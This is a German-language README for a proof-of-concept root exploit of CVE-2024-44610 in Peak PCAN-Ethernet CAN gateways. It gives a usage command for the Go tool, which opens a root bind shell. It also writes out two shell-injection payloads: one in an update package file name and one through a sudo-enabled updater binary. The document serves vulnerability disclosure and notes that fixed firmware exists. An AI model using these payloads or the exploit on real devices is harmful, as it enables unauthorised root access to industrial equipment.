
CVE-2024-44610: Authentifizierter Remote-Root-Exploit in Peak PCAN-Ethernet CAN-(FD)-Gateways
Dieses Repository enthält einen Proof-of-Concept (PoC)-Exploit, der Code als Root auf Peak-Ethernet-Gateways ausführt. Es erfordert, dass Sie die Anmeldedaten für die Weboberfläche kennen.
Der Hersteller hat schnell behobene Firmware bereitgestellt:
Kompilieren Sie das Programm mit Golang und führen Sie es dann wie folgt aus:
./PcanExploit -ip 192.168.1.10 -httpaddr 192.168.1.250 -user admin -pass admin [-fd]
Wenn der Exploit erfolgreich war, wird eine Bind-Shell auf dem Gerät als Root gestartet. Sie können zwei Screenshots am unteren Rand dieser Seite sehen.
Die Optionen haben folgende Bedeutung:
Während die Nicht-FD-Version ebenfalls anfällig ist, ist dies von geringer praktischer Bedeutung, da diese Geräte keine signierten Firmware-Updates implementieren und Sie daher einfach Ihre eigene modifizierte Firmware hochladen könnten.
Zwei Shell-Befehlsinjektions-Schwachstellen werden ausgenutzt:
Es ist möglich, einen Shell-Befehl in den Dateinamen des Update-Pakets einzufügen, das in die Weboberfläche hochgeladen wird, zum Beispiel:
test';ping 1.1.1.1;'.raucb
Der Befehl wird als Benutzer www-data ausgeführt, der den Webserver betreibt. Der Dateiname muss die richtige Erweiterung haben (tar oder raucb, abhängig vom Gerät).
Das Binary führt intern system auf dem bereitgestellten Dateinamen aus, solange dieser existiert. Es kann wie folgt ausgenutzt werden:
sudo /home/peak/updater -f "a;ping 1.1.1.1;"
Da dieses Binary mit sudo ausgeführt werden kann, ist es möglich, den Befehl als root auszuführen.
FD-Gerät:

Nicht-FD-Gerät:
